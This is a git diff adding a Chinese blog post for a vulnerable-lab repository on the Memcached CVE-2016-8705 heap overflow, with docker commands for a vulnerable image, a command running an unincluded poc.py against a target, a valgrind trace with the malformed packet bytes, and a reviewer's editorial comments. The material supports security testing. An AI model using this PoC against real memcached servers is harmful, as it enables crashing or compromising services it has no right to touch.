diff --git a/_posts/2017-03-10-m_memcached_cve-2016-8705.md b/_posts/2017-03-10-m_memcached_cve-2016-8705.md new file mode 100644 index 0000000..75c87ff --- /dev/null +++ b/_posts/2017-03-10-m_memcached_cve-2016-8705.md 
@@ -0,0 +1,114 @@ +--- +layout: post +title: "Memcached Server UPDATE 远程代码执行漏洞(CVE-2016-8705)" +date: 2017-03-10 00:15:16 +0800 +image: '/assets/img/' +description: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.' +main-class: 'hole' +color: '#B31917' +tags: +- Memcached +- RCE +categories: +- Memcached +twitter_text: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.' +introduction: 'Multiple integer overflows in processbinupdate function which is responsible for processing multiple commands of Memcached binary protocol can be abused to cause heap overflow and lead to remote code execution.' +--- + +### 说明 + + 感谢 [@xing-xiao](https://github.com/xing-xiao) 提供原始环境。 #6 + +### 漏洞信息 + + * [CVE-2106-8705漏洞信息](http://www.talosintelligence.com/reports/TALOS-2016-0220/) + +### 获取环境: + +1. 拉取镜像到本地 + ```bash +$ docker pull medicean/vulapps:m_memcached_CVE-2016-8705 + ``` + +2. 启动环境 + ```bash +$ docker run -d -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705 + ``` + + > 如果需要追溯堆栈,需在启动时 valgrind 调试 memcached,则启动环境命令如下: + + ```bash +$ docker run -i -t -u root -p 11211:11211 medicean/vulapps:m_memcached_CVE-2016-8705 /valgrind.sh + ``` + +### 使用国内阿里云镜像 + +1. 拉取镜像到本地 + ```bash +$ docker pull registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32 + ``` + +2. 
启动环境 + ```bash +$ docker run -d -p 11211:11211 registry.cn-hangzhou.aliyuncs.com/lo0o/memcached:1.4.32 + ``` + +### PoC + +1.获取目标 IP 地址与端口号,如:192.168.100.2 端口号为 11211 + +2.执行 poc.py + +```bash +$ python poc.py 192.168.100.2 11211 +``` + +3.查看追溯堆栈结果 + +``` +36: Client using the binary protocol +<36 Read binary protocol data: +<36 0x80 0x02 0x00 0xfa +<36 0x08 0x00 0x00 0x00 +<36 0xff 0xff 0xff 0xd0 +<36 0x00 0x00 0x00 0x00 +<36 0x00 0x00 0x00 0x00 +<36 0x00 0x00 0x00 0x00 +36: going from conn_parse_cmd to conn_nread +<36 ADD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Value len is -306 +==8== Thread 3: +==8== Invalid write of size 8 +==8== at 0x4C326CB: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) +==8== by 0x4132C8: memcpy (string3.h:53) +==8== by 0x4132C8: do_item_alloc (items.c:238) +==8== by 0x40A15A: process_bin_update (memcached.c:2222) +==8== by 0x40A15A: complete_nread_binary (memcached.c:2427) +==8== by 0x40A15A: complete_nread (memcached.c:2484) +==8== by 0x40D367: drive_machine (memcached.c:4656) +==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9) +==8== by 0x414874: worker_libevent (thread.c:380) +==8== by 0x52A26B9: start_thread (pthread_create.c:333) +==8== Address 0x5d1ae90 is 0 bytes after a block of size 1,048,512 alloc'd +==8== at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) +==8== by 0x40F9DF: memory_allocate (slabs.c:538) +==8== by 0x40F9DF: do_slabs_newslab (slabs.c:233) +==8== by 0x40FA6E: do_slabs_alloc (slabs.c:328) +==8== by 0x41007E: slabs_alloc (slabs.c:584) +==8== by 0x4131E6: do_item_alloc (items.c:180) +==8== by 0x40A15A: process_bin_update (memcached.c:2222) +==8== by 0x40A15A: complete_nread_binary (memcached.c:2427) +==8== by 
0x40A15A: complete_nread (memcached.c:2484) +==8== by 0x40D367: drive_machine (memcached.c:4656) +==8== by 0x4E47A0B: event_base_loop (in /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5.1.9) +==8== by 0x414874: worker_libevent (thread.c:380) +==8== by 0x52A26B9: start_thread (pthread_create.c:333) +==8== +``` + +> 注意: +> +> 该 PoC 并不会造成服务端崩溃。 + +### Exp + +> 暂无命令执行 Exp,如果你愿意分享该 Exp 可向本仓库发起 [Pull Request](https://github.com/Medicean/VulApps/compare)
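Review bot: the link text under 漏洞信息 reads `* [CVE-2106-8705漏洞信息](http://www.talosintelligence.com/reports/TALOS-2016-0220/)` while the filename, title and description all use CVE-2016-8705; fix the transposed digits so anyone searching for the real identifier finds this post. The front-matter `description`, `twitter_text` and `introduction` fields name the function as `processbinupdate`, but the valgrind trace further down shows `process_bin_update (memcached.c:2222)`; the underscores look dropped, so restore them in all three fields. The fenced blocks inside the numbered steps have their opening and closing fences indented by three spaces while the `$ docker ...` command line is flush left, and the PoC steps are written without a space after the number (`1.获取目标 IP 地址与端口号`), so the renderer will neither keep the fences inside the list items nor treat the steps as an ordered list; align the fences with the list text and write `1. ` with a space. Step 2 of the PoC runs `$ python poc.py 192.168.100.2 11211`, but this patch adds only the post and no `poc.py`; link to where the script lives in the repository or say that it is not included. Finally, the post only identifies the affected build through the image tag `memcached:1.4.32`; state in prose which versions are affected and which release carries the fix so readers know what to upgrade to.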